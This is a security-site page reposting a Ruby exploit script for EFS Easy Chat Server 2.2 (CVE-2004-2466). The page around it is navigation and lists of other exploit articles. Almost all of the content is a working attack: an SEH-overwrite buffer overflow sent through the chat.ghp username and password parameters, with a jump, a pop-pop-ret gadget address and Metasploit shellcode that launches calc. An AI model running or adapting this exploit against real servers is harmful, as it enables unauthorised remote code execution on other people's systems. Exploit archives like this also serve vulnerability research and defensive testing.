首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exploit EFS Software Easy Chat Server v2.2
来源:https://www.securinfos.info 作者:Babio 发布时间:2010-01-19  

#!/usr/bin/ruby

# Title: Exploit EFS Software Easy Chat Server v2.2
# EDB-ID:
# CVE-ID: 2004-2466
# OSVDB-ID: 7416
# Author: John Babio
# Published: 2010-01-17
# Tested on: [Windows XP Sp3 Eng]
# Download Exploit Code
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)


require 'net/http'
require 'uri'
require 'socket'


jmp = "\xeb\x06\x90\x90"
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"

buffer = "\x41" * 216 + jmp + ppr + shellcode

url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 'fasync_helper()'
·Muziic Player 2.0 (.mp3) Local
·Internet Explorer 6/7/8 DOS Vu
·Microsoft Internet Explorer "A
·This program acts as a web ser
·AOL 9.5 ActiveX Heap Overflow
·Millenium MP3 Studio v1.X (.m3
·Windows Media Player 11 Active
·Microsoft Windows Defender Act
·VLC vs 0.6.8 [b][c][d][a] .ASS
·Foxit Reader v3.1.4.1125 Activ
·Audiotran v1.4.1 direct RET BO
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved